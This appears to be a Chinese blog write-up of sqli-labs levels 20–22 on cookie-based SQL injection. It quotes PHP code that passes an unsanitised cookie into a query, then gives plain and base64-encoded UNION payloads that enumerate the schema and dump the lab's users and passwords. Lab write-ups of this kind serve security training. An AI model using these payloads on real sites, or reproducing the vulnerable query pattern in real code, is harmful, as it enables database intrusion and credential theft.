2. 程式人生 > 實用技巧 >sqli-labs 20-22 --cookie注入

sqli-labs 20-22 --cookie注入

阿新 發佈:2020-07-23

異常處理

一開始開啟這個題目的時候找不到cookie...
登入成功就是沒有cookie

cookie注入沒有cookie...
第二天重新做的時候,同學講自己設定cookie可以用
用外掛EditThiscookie新增

可以開始注入了!

知識點

cookie注入,簡單地講就是注入點在cookie。對於cookie的過濾總是不如直接傳入的資料那麼嚴格

做題過程

原始碼(部分)

.
.
.
//前面的一部分對使用者名稱和密碼有嚴格過濾,但是這裡可以看到是直接從header中獲取資料
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo "<br><br><b>";
echo '<br><font color= "red" font size="4">';	
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "</font><br>";	
echo '<font color= "cyan" font size="4">';	
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];			
echo "</font><br>";			
echo '<font color= "#FFFF00" font size = 4 >';
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo '<font color= "orange" font size = 5 >';			
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
			
			
echo "<br></font>";
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";//沒有對cookie做任何處理,直接傳入了資料庫
$result=mysql_query($sql);
if (!$result)
  	{
  	die('Issue with your mysql: ' . mysql_error());//打印出錯誤資訊
  	}
.
.
.

測試欄位

payload:' order by 3#
payload:' order by 4#


欄位數為3

資料庫

payload:'union select database(),database(),database()#
個人習慣,沒有測回顯在哪個欄位,所有位置先填上database()

result:security

payload:'union select database(),database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')#



result:emails,referers,uagents,users

欄位

payload:'union select database(),( select group_concat( column_name ) from information_schema.columns where table_name='users'),null#

result:id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

payload:'union select null,(select group_concat(id,0x3a,username,0x3a,password) from security.users),null#



result:1:Dumb:Dumb,2:Angelina:I-kill-you,3:Dummy:p@ssword,4:secure:crappy,5:stupid:stupidity,6:superman:genious,7:batman:mob!le,8:admin:admin

less-21

思路

基本和less-20是相同的,但是對於cookie有一個base64加密解密的過程,同時還用()把cookie包了起來,所以構造的時候注意下,把上面的複製貼上base64就可以
關鍵原始碼

$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

payload:

1.Jykgb3JkZXIgYnkgMyM=
//') order by 3#
2.JykgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksZGF0YWJhc2UoKSxkYXRhYmFzZSgpIw==
//') union select database(),database(),database()#
3.JykgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksZGF0YWJhc2UoKSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpIw==
//') union select database(),database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')#
4.JykgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksKCBzZWxlY3QgZ3JvdXBfY29uY2F0KCBjb2x1bW5fbmFtZSApIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnKSxudWxsIw==
//') union select database(),( select group_concat( column_name ) from information_schema.columns where table_name='users'),null#
5.JykgdW5pb24gc2VsZWN0IG51bGwsKHNlbGVjdCBncm91cF9jb25jYXQoaWQsMHgzYSx1c2VybmFtZSwweDNhLHBhc3N3b3JkKSBmcm9tIHNlY3VyaXR5LnVzZXJzKSxudWxsIw==
//') union select null,(select group_concat(id,0x3a,username,0x3a,password) from security.users),null#

less-22

思路

差不多,多了一個"拼接,然後還是有base64加密解密,同上。
關鍵原始碼

$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

payload

1.b3JkZXIgYnkgMyM=
//" order by 3#
2.IiB1bmlvbiBzZWxlY3QgZGF0YWJhc2UoKSxkYXRhYmFzZSgpLGRhdGFiYXNlKCkj
//" union select database(),database(),database()#
3.IiB1bmlvbiBzZWxlY3QgZGF0YWJhc2UoKSxkYXRhYmFzZSgpLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5Jykj
//" union select database(),database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')#
4.IiB1bmlvbiBzZWxlY3QgZGF0YWJhc2UoKSwoIHNlbGVjdCBncm91cF9jb25jYXQoIGNvbHVtbl9uYW1lICkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpLG51bGwj
//" union select database(),( select group_concat( column_name ) from information_schema.columns where table_name='users'),null#
5.IiB1bmlvbiBzZWxlY3QgbnVsbCwoc2VsZWN0IGdyb3VwX2NvbmNhdChpZCwweDNhLHVzZXJuYW1lLDB4M2EscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMpLG51bGwj
//" union select null,(select group_concat(id,0x3a,username,0x3a,password) from security.users),null#

相關推薦

sqli-labs 20-22 --cookie注入

異常處理 一開始開啟這個題目的時候找不到cookie... 登入成功就是沒有cookie cookie注入沒有cookie...

Sqli-Labs Less12:POST注入

開啟bp抓包 傳送至Repeater,新增 \\ 進行測試 根據報錯:222\") 猜測查詢語句: select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

sqli-labs less38-53(堆疊注入 order by之後相關注入)

堆疊注入 less-38 less-39 less-40 less-41 less-42 less-43 less-44 less-45 考察order by相關注入 less-46

SQLi-LABS 第一關 SQL注入 總結

SQLi-LABS 第一關 SQL注入 總結 關卡簡介 關卡提示:GET-Error based- Single quotes-String 注入位置:GET

sqli-labs less 22 Future Editions

技術標籤:sqli-labsmysql安全 一、22關與上一關也是基本相同,只不過閉合方式不一樣,看一下程式碼,可以看到這裡是用雙引號進行閉合

sqli-labs less13-20(各種post型頭部注入)

less-13 POST型雙查詢注入 less-14 POST型雙查詢注入 less-15 POST型布林注入 less-16 POST型布林注入

sqli-labs個人注入心得

閉合方式型別都有一般是’,\",或 無閉合符號 或 \'),\") Less-1 嘗試?id=1 註釋符號為–+、-- 、#。

sqli-labs學習sql注入

sqli-labs的安裝和配置 下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0,不然容易出錯,本人就是PHP study版本高了,一直出錯)

sqli-labs第一關:基於錯誤的GET單引號字元型注入

點進去題目:提示我們輸入題目id,第一題,所以我們輸入?id=1,回車即可。如圖:首先可以判斷這裡接受的是一個GET請求,先在1後面加一個’ 發現報錯,說明這裡沒有過濾掉引號,所以這裡是一個注入點 SQL注入

sqli-labs Less7 匯出檔案字元型注入

Less-7 GET - Dump into outfile - String (匯出檔案GET字元型注入) 匯出到檔案就是可以將查詢結果匯出到一個檔案中,如常見的將一句話木馬匯出到一個php檔案中,常用的語句是:select “<?php @eval(

sqli-labs less11-12(post型union注入)

less-11 post型union注入 過程: 輸入admin admin 判斷username password的閉合方式 對username查欄位個數

sqli-labs-Less 1-10 之手工注入和sqlmap注入

宣告 學習SQL注入,提高網路安全能力,其實大部分環境下,測試人員做的工作都截止到漏洞發現,簡單回顧一下,漏洞發現的實質就是發現SQL語句的閉合方式,一般來講都圍繞著這幾個符號

sqli-labs less32-37(寬位元組注入)

Bypass addslashes() Bypass addslashes() Bypass Add SLASHES addslashes() Bypass MySQL Real Escape String

SQLI-LABS Page1 11-20

0x0B Less-11 報錯注入,只是注入方式為POST,可以直接使用報錯函式進行注入,也可以使用常規方法

Sqli-labs 第2關 SQL注入 Writeup

Sqli-labs 第2關 SQL注入 Writeup 關卡簡介 關卡提示:GET-Error based - Intiger based 注入位置:GET

Sqli-labs 第3關 SQL注入 Writeup

Sqli-labs 第3關 SQL注入 Writeup 關卡簡介 關卡提示:GET -Error based- Single quotes with twist- string

sqli-labs闖關(11-20)

sqli-labs闖關(11-20) less-11 1、11-20關都為post傳遞,我們可以使用burp抓包來修改post提交的資料。

sqli-labs(32-37)寬位元組注入

32 寬位元組-報錯注入 輸入?id=2\',發現引號被轉義了,沒有報錯 一般情況下,這裡是不存在SQL注入的,但有一個特殊情況,就是資料庫使用GBK編碼,可以用寬位元組注入

sqli-labs(11-20

less-11 本關還可以使用union聯合查詢注入和盲注 (1)使用burpsuite抓包,修改引數構造payload。

sqli-labs闖關筆記-less2-數字型注入

開啟Less-2中index.php檔案,在第32行$sql=\"SELECT * FROM users WHERE id=\'$id\' LIMIT 0,1\";後面新增如下兩行: